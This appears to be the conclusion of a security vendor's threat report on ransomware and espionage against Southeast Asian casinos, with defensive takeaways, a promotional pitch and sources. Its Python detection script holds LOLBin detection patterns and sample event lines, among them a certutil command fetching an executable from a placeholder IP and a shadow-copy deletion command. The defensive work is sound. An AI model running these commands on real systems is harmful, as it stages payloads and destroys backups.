From stealthy espionage campaigns to brazen ransomware extortions, the period 2023–2025 has shown that Southeast Asia’s casinos and integrated resorts are firmly in the crosshairs of cyber threat actors. Public breaches at Marina Bay Sands, a major Philippine resort, and others are likely just the tip of the iceberg. Attackers – whether nation-state APTs leveraging custom malware (e.g., DiceyF’s GamePlayerFramework) or cybercriminal cartels wielding ransomware (BlackCat, Clop) – have demonstrated the means to infiltrate these complex enterprises, often by exploiting the very traits that make casinos unique: large networks of interlinked systems, vast amounts of sensitive data, and the imperative to keep services uninterrupted 24/7.
The tactics observed reveal that many intrusions did not rely on sophisticated zero-day exploits but on opportunistic abuse of weak links, human or technological. Yet once inside, attackers often displayed persistence, coordination, and a deep understanding of casino operations. The fallout has been significant: multi-million dollar financial losses, hundreds of thousands of customer records compromised, and operational downtime that directly impacts revenue and reputation. The ripple effects also extend to the wider gaming supply chain, as seen in breaches of vendors like IGT and Aristocrat, which indirectly impact casino operations across the region.
The real turning point of 2023–2025 is the convergence of tactics: state-sponsored groups sometimes deploying ransomware as smokescreens, while cybercriminal gangs adopt APT-like tradecraft. Meanwhile, geopolitical shifts and uneven regulation across ASEAN have created a patchwork of defenses that sophisticated adversaries exploit.
But this is not a lost game. Most of these breaches were preventable—or at least containable—if better visibility, preparedness, and response mechanisms were in place.
As one industry cybersecurity expert aptly warned:
“Attackers have discovered that casino companies are not always the impenetrable fortresses we see in the movies.”
Key Takeaways: What Casino Security Leaders Must Prioritize
- Prioritize Identity and Access Hardening
The most common entry points remain compromised credentials, VPN abuse, and helpdesk impersonation. Implement phishing-resistant MFA, harden RDP access, and conduct regular credential audits.
- Patch Web Applications and Monitor Third-Party Software
Exploited systems in this sector have included public-facing apps, third-party software and suppliers (e.g., MOVEit Transfer, and the IGT and Aristocrat incidents), and overlooked CMS vulnerabilities. Maintain tight patch hygiene, especially for externally accessible systems.
- Build Detection Around Attacker Behaviors, Not Just Alerts
Deploy detection rules for TTPs seen in real casino incidents: DCSync, LOLBins, use of remote management tools, illicit VPN installs, and lateral movement to backup servers.
- Invest in Response Readiness
Run realistic tabletop exercises tailored to casino environments. Have service-level agreements with external incident responders in place before a breach.
- Secure the Supply Chain
Casinos rely on complex vendor ecosystems—ensure third-party security assessments and breach notification protocols are part of procurement contracts.
- Don’t Just React—Plan Strategically
Modern threat actors exploit systemic gaps. It’s time to go beyond tools and dashboards. Invest in outcome-based security services that close the gap between detection and action.
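The ATT&CK breakdown earlier in this report and the detection takeaway above point at the same handful of behaviours: DCSync against domain controllers, RMM tools and LOLBins on workstations, shadow-copy deletion before encryption, and unsanctioned tunnels. The Python below is an added example, not the report's own detection content or any vendor's rule set; it runs those checks over a few constructed, flattened Windows event records (Event IDs 4662, 4688 and 7045). Hostnames, user names, the replication allowlist and the key="value" collector format are assumptions.

```python
"""Behaviour-based detection over constructed Windows event records.

Added example for this report (not the report's own code or any vendor's
detection content). It covers TTPs listed in the ATT&CK breakdown and in the
"detect attacker behaviours" takeaway: DCSync (Event ID 4662 requesting
directory-replication rights), RMM tools and LOLBins (Event ID 4688), shadow
copy deletion ahead of encryption, and tunnel/RMM services being installed
(Event ID 7045). Hostnames, users, paths and the allowlist are assumptions.
"""
import re
from dataclasses import dataclass

# Well-known Active Directory control-access-right GUIDs that a replication
# (DCSync) request carries: DS-Replication-Get-Changes and -Get-Changes-All.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Non-DC accounts allowed to replicate (assumption: maintained by the defender).
REPLICATION_ALLOWLIST = {"AZUREADSSOACC$"}

# Remote-management binaries: ScreenConnect appears in the incidents above,
# the others are common alternatives an intruder may drop.
RMM_IMAGES = {"screenconnect.clientservice.exe", "anydesk.exe", "ateraagent.exe"}

# Service image paths hinting at an unsanctioned VPN tunnel or RMM agent.
TUNNEL_SERVICE_HINTS = ("softether", "openvpn", "wireguard", "screenconnect", "anydesk")

# Signed Windows binaries abused for download, execution, remote process
# creation and backup destruction, keyed to the ATT&CK technique they map to.
LOLBIN_PATTERNS = [
    ("T1105 certutil download",    re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("T1218.005 mshta remote",     re.compile(r"\bmshta(\.exe)?\b\s+https?://", re.I)),
    ("T1047 wmic remote process",  re.compile(r"\bwmic(\.exe)?\b.*process\s+call\s+create", re.I)),
    ("T1490 shadow copy deletion", re.compile(r"\bvssadmin(\.exe)?\b\s+delete\s+shadows", re.I)),
]

@dataclass
class Finding:
    technique: str
    host: str
    user: str
    detail: str

def parse_event(line):
    """Flattened key="value" event record -> dict (collector format assumed)."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))

def detect(line):
    """Return a Finding for one event record, or None if it looks benign."""
    ev = parse_event(line)
    eid, host, user = ev.get("EventID"), ev.get("Computer", "?"), ev.get("SubjectUserName", "?")
    if eid == "4662":
        props = ev.get("Properties", "").lower()
        if DS_REPL_GET_CHANGES in props or DS_REPL_GET_CHANGES_ALL in props:
            # Domain controllers replicate with their machine accounts (trailing $).
            if not user.endswith("$") and user.upper() not in REPLICATION_ALLOWLIST:
                return Finding("T1003.006 DCSync", host, user, "replication rights requested by a non-DC account")
    elif eid == "4688":
        image = ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "")
        if image in RMM_IMAGES:
            return Finding("T1219 remote access software", host, user, image)
        for technique, pattern in LOLBIN_PATTERNS:
            if pattern.search(cmd):
                return Finding(technique, host, user, cmd)
    elif eid == "7045":
        path = ev.get("ImagePath", "").lower()
        if any(hint in path for hint in TUNNEL_SERVICE_HINTS):
            return Finding("T1133/T1219 tunnel or RMM service installed", host, user, ev.get("ServiceName", "?"))
    return None

def scan(lines):
    return [f for f in map(detect, lines) if f is not None]

# Constructed sample records; the DC-to-DC replication and the Excel launch must stay silent.
SAMPLE_EVENTS = [
    'EventID="4662" Computer="DC01.casino.local" SubjectUserName="DC02$" AccessMask="0x100" Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID="4662" Computer="DC01.casino.local" SubjectUserName="svc_backup" AccessMask="0x100" Properties="{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID="4688" Computer="FIN-WS07.casino.local" SubjectUserName="j.tan" NewProcessName="C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe" CommandLine="ScreenConnect.ClientService.exe"',
    'EventID="4688" Computer="HOTEL-PMS01.casino.local" SubjectUserName="j.tan" NewProcessName="C:\\Windows\\System32\\certutil.exe" CommandLine="certutil.exe -urlcache -split -f http://203.0.113.10/u.txt C:\\Users\\Public\\u.exe"',
    'EventID="4688" Computer="BKP01.casino.local" SubjectUserName="svc_backup" NewProcessName="C:\\Windows\\System32\\vssadmin.exe" CommandLine="vssadmin.exe delete shadows /all /quiet"',
    'EventID="4688" Computer="FIN-WS07.casino.local" SubjectUserName="j.tan" NewProcessName="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" CommandLine="EXCEL.EXE"',
    'EventID="7045" Computer="APP03.casino.local" SubjectUserName="svc_backup" ServiceName="WinSvcUpdate" ImagePath="C:\\ProgramData\\upd\\softether\\vpnserver.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.technique}] {f.host} {f.user}: {f.detail}")
```

The DCSync check keys on the replication control-access GUIDs rather than on a tool name, so it catches Mimikatz, Impacket's secretsdump and any other implementation; the exclusion is by machine account and an explicit allowlist rather than by process, because legitimate replication never originates from a human user. The RMM and tunnel lists should be tuned to what the property actually sanctions, otherwise an approved ScreenConnect deployment will drown the signal.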
THEOS Cyber: Your Partner in Resilience
THEOS Cyber works with top-tier casino and online gaming operators across the region, providing elite cyber defence services tailored to high-risk, high-value environments like yours. Whether it’s proactive red teaming, VAPT, strategic incident readiness planning, or real-time DFIR and SOC response, we help gaming enterprises close the gap between threat and action—before attackers cash in.
Cyber threats in the casino sector aren’t theoretical anymore. They’re here, evolving, and often one step ahead. Let’s change that.
Sources
Recent threat intelligence and incident reporting from Inside Asian Gaming, BleepingComputer, The Record, RH-ISAC, TRM Labs, and vendor threat landscape reports (CrowdStrike, ENISA, Unit 42), among others. These illustrate and corroborate the trends discussed above, reflecting a diverse and evolving threat landscape for the casino industry in Southeast Asia. Each citation corresponds to specific details in the analysis for verification and further reference.
CrowdStrike 2024 Global Threat Report (February 2024)
CrowdStrike Intelligence Weekly Report – Week of 20 January 2024
CrowdStrike Intelligence Weekly Report – Week of 6 April 2024
CrowdStrike Intelligence Weekly Report – Week of 29 June 2024
Sophos – Sophos State of Ransomware 2025 (2025)
https://www.sophos.com/en-us/content/state-of-ransomware
Sophos – Operation Crimson Palace, Chinese State-Sponsored Espionage, Expands in Southeast Asia, Sophos Report Finds (September 2024)
https://www.sophos.com/en-us/press/press-releases/2024/09/operation-crimson-palace-chinese-state-sponsored-espionage-expands-0
The Hacker News – Operation ChattyGoblin: Hackers Targeting Gambling Firms via Chat Apps (May 2023)
https://thehackernews.com/2023/05/operation-chattygoblin-hackers.html
ESET – ESET APT Activity Report Q4 2022–Q1 2023 (May 2023)
https://www.welivesecurity.com/2023/05/09/eset-apt-activity-report-q42022-q12023/
Bleeping Computer – Hackers target Asian casinos in lengthy cyberespionage campaign (October 2022)
https://www.bleepingcomputer.com/news/security/hackers-target-asian-casinos-in-lengthy-cyberespionage-campaign/
Trend Micro – Operation Earth Berberoka (May 2022)
https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf
SC Media – Over $41M stolen from Stake.com in cryptocurrency heist (September 2023)
https://www.scworld.com/brief/over-41m-stolen-from-stake-com-in-cryptocurrency-heist
MITRE ATT&CK – APT38 (January 2025 version)
https://attack.mitre.org/groups/G0082/
FBI – FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com (September 2023)
https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom
Tech Target: Caesars Entertainment breached in social engineering attack (September 2023)
https://www.techtarget.com/searchsecurity/news/366552134/Caesars-Entertainment-breached-in-social-engineering-attack
Ars Technica – A phone call to helpdesk was likely all it took to hack MGM (September 2023)
https://arstechnica.com/security/2023/09/a-phone-call-to-helpdesk-was-likely-all-it-took-to-hack-mgm/
SANS – Defending Against SCATTERED SPIDER and The Com with Cybercrime Intelligence (July 2024)
https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence
CISA – #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability (June 2023)
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a
Trend Micro – Ransomware Spotlight – Clop (February 2022)
https://www.trendmicro.com/vinfo/ph/security/news/ransomware-spotlight/ransomware-spotlight-clop
Trellix – Inside the LockBit’s Admin Panel Leak: Affiliates, Victims and Millions in Crypto (June 2025)
https://www.trellix.com/blogs/research/inside-the-lockbits-admin-panel-leak-affiliates-victims-and-millions-in-crypto/
Reuters – MGM Resorts breached by ‘Scattered Spider’ hackers: sources (September 2023)
https://www.reuters.com/technology/moodys-says-breach-mgm-is-credit-negative-disruption-lingers-2023-09-13/
U.S. Securities and Exchange Commission – MGM Resorts International Form 8-K on the cyber incident, EDGAR (September 2023)
https://www.sec.gov/ix?doc=/Archives/edgar/data/0001590895/000119312523235015/d537840d8k.htm
Palo Alto Networks Unit 42 Incident Response Report (February 2024)
https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/
ENISA Threat Landscape 2024 (May 2024)
https://securitydelta.nl/media/com_hsd/report/690/document/ENISA-Threat-Landscape-2024.pdf
Fortinet Global Threat Landscape Report 2025 (August 2025)
https://www.fortinet.com/resources/reports/threat-landscape-report
Cisco Talos Year in Review (March 2025)
https://blog.talosintelligence.com/2024yearinreview/
The Record – Gambling and lottery giant disrupted by cyberattack, working to bring systems back online (November 2024)
https://therecord.media/gambling-lottery-giant-hit-with-disruptive-cyberattack
Center for Strategic and International Studies – Cutting Losses: Southeast Asia’s Crackdown on Online Gambling (July 2025)
https://www.csis.org/blogs/new-perspectives-asia/cutting-losses-southeast-asias-crackdown-online-gambling
Kaspersky Securelist – DiceyF and GamePlayerFramework analysis (October 2022)
https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/
SentinelOne Labs – DLL Hijacking in Asian Gambling Sector (August 2023)
https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/
The Record – Singapore’s Marina Bay Sands says 665,000 customers had data stolen during cyberattack (November 2023)
https://therecord.media/singapore-marina-bay-customers-data-cyberattack
United Nations Office on Drugs and Crime (UNODC) – North Korean money laundering through SEA casinos (January 2024)
https://www.unodc.org/roseap/uploads/documents/Publications/2024/Casino_Underground_Banking_Report_2024.pdf
Reuters – North Korean hackers, criminals share money laundering networks in Southeast Asia – UN (January 15, 2024)
https://www.reuters.com/world/asia-pacific/north-korean-hackers-criminals-share-money-laundering-networks-southeast-asia-un-2024-01-15/
United Nations Office on Drugs and Crime (UNODC) (September 2023) – Casinos, cyber fraud, and trafficking in persons for forced criminality in Southeast Asia
https://www.unodc.org/roseap/uploads/documents/Publications/2023/TiP_for_FC_Policy_Report.pdf
SC World – Mounting pro-Russian DDoS attacks launched against Japan (December 2024)
https://www.scworld.com/brief/mounting-pro-russian-ddos-attacks-launched-against-japan
United Nations Office on Drugs and Crime (UNODC) – Transnational Organized Crime and the Convergence of Cyber-Enabled Fraud, Underground Banking and Technological Innovation in Southeast Asia: A Shifting Threat Landscape (October 2024)
https://www.unodc.org/roseap/uploads/documents/Publications/2024/TOC_Convergence_Report_2024.pdf